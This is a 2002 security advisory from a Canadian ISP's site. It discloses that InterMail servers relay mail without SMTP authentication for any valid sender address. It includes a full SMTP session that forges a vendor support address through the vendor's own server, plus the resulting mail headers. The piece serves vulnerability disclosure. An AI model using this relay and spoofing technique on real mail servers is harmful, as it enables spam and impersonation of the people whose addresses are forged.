To contact us:

Phone: +1(604)671-5123

Fax: +1(604)552-8573

Port Coquitlam, B.C.

CANADA  V3B6H2

kendryl.com

Home

Products

Support

Webmail

Projects

Wassup

Reviews

Links

Contact

Forum

AUP

Search

kendryl.net

Privacy

Security Alert - InterMail

Will Relay Email for a Valid Mailbox without SMTP authentication

Author: Victoria Chan, Chief Security Officer

Date: August 14th 2002

After applying the patch for InterMail Servers so that it will no longer accept bogus mailboxes with correct domains, as exploited by the Klez and work alike Virus, there is still another vulnerability. InterMail Servers could still be further exploited. All you need to know is a valid email address, and that is easily available by visiting home pages. The ramifications of this vulnerability is that InterMail users could be framed for sending out SPAM. I will not go into detail on how to set up a Mail Client to do that as that would be a recipe for Spammers. OpenWave are the makers of InterMail. By simply visiting OpenWave's Home Page, I got valid email addresses.


Doing an NSLOOKUP determined the best MX for openwave.com is [smtp1.openwave.com]. You start an SMTP session with that server, and use the valid email address for the MAIL FROM. The RCPT TO can be any valid email address you want to send this piece of email via the exploited InterMail Server. To demonstrate this vulnerability, I have effectively exploited OpenWave's own InterMail server - note lack of authentication required to relay:


Trying 206.46.164.24...

Connected to smtp1.openwave.com.

Escape character is '^]'.

220 oe-ismta1.bizmailsrvcs.net ESMTP server (InterMail vM.5.01.03.15 201-253-122-118-115-20011108) ready Wed, 14 Aug 2002 18:10:36 -0500

HELO westernstar.kendryl.net

250 oe-ismta1.bizmailsrvcs.net

MAIL FROM: support@openwave.com

250 Sender <support@openwave.com> Ok

RCPT TO: abuse@kendryl.net

250 Recipient <abuse@kendryl.net> Ok

DATA

354 Ok Send data ending with <CRLF>.<CRLF>

Subject: InterMail Relay without SMTP Authentication

From: support@openwave.com

To: abuse@kendryl.net

InterMail Relay without SMTP Authentication

.

250 Message received: 20020814231108.XCMY18545.oe-ismta1.bizmailsrvcs.net@westernstar.kendryl.net

QUIT

221 oe-ismta1.bizmailsrvcs.net ESMTP server closing connection

Connection closed by foreign host.



Here is the vulnerability confirmed by receiving the piece of relayed email:

Return-Path: <support@openwave.com>

Delivered-To: abuse@kendryl.net

Received: (qmail 42376 invoked by uid 1007); 14 Aug 2002 23:12:03 -0000

Received: from support@openwave.com by westernstar.kendryl.net

  by uid 1004 by STACKFIT (Scanned4 Virus & SPAM Keywords 0.496784); 14 Aug 2002 23:12:03 -0000

Received: from oe-mp1pub.managedmail.com (HELO oe-mp1.bizmailsrvcs.net) (206.46.164.22)

  by 820252.cipherkey.com with SMTP; 14 Aug 2002 23:12:03 -0000

Received: from oe-ismta1.bizmailsrvcs.net ([206.46.164.26])

          by oe-mp1.bizmailsrvcs.net

          (InterMail vM.5.01.03.15 201-253-122-118-115-20011108) with ESMTP

          id <20020814231201.UJUZ21795.oe-mp1.bizmailsrvcs.net@oe-ismta1.bizmailsrvcs.net>

          for <abuse@kendryl.net>; Wed, 14 Aug 2002 18:12:01 -0500

Received: from westernstar.kendryl.net ([64.114.82.252])

          by oe-ismta1.bizmailsrvcs.net

          (InterMail vM.5.01.03.15 201-253-122-118-115-20011108) with SMTP

          id <20020814231108.XCMY18545.oe-ismta1.bizmailsrvcs.net@westernstar.kendryl.net>

          for <abuse@kendryl.net>; Wed, 14 Aug 2002 18:11:08 -0500

Subject: InterMail Relay without SMTP Authentication

From: support@openwave.com

To: abuse@kendryl.net

Message-Id: <20020814231108.XCMY18545.oe-ismta1.bizmailsrvcs.net@westernstar.kendryl.net>

Date: Wed, 14 Aug 2002 18:12:01 -0500


InterMail Relay without SMTP Authentication


Disclaimer - This is only a security audit. The above examples are actual SMTP transactions intended to demonstrate this InterMail Vulnerability. The information herein is not intended to be used to carry out exploits on InterMail Servers.